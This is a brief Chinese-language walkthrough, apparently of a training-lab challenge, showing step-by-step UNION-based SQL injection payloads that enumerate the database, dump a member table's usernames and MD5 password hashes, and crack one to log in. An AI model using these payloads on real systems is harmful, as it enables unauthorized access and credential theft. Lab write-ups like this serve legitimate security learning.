尝试在URL后,输入and 1=1显示正常,and 1=2显示不正常,判断此处存在SQL注入
order by 获取字段数为4
and 1=2 union select 1,2,3,4 发现2在原文Title处,3在content处
and 1=2 union select 1,version(),database(),4 爆库得到
and 1=2 union select 1,version(),(select group_concat(table_name)from information_schema.tables where table_schema=database()),4爆表得到
and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’ 爆字段
and 1=2 union select 1,group_concat(name,0x5f,password,0x5f, status),3,4 from StormGroup_member 爆用户名密码 爆出的用户名密码有两个,先进行MD5解码的到密码,把两个都试了一遍,发现第二个才是正确的。 mozhe_96e2c5f641904870aff665c27d7bdcb1_1解密后得到密码:248680。 在登录界面输入用户名:mozhe,密码:248680,即可得到key。
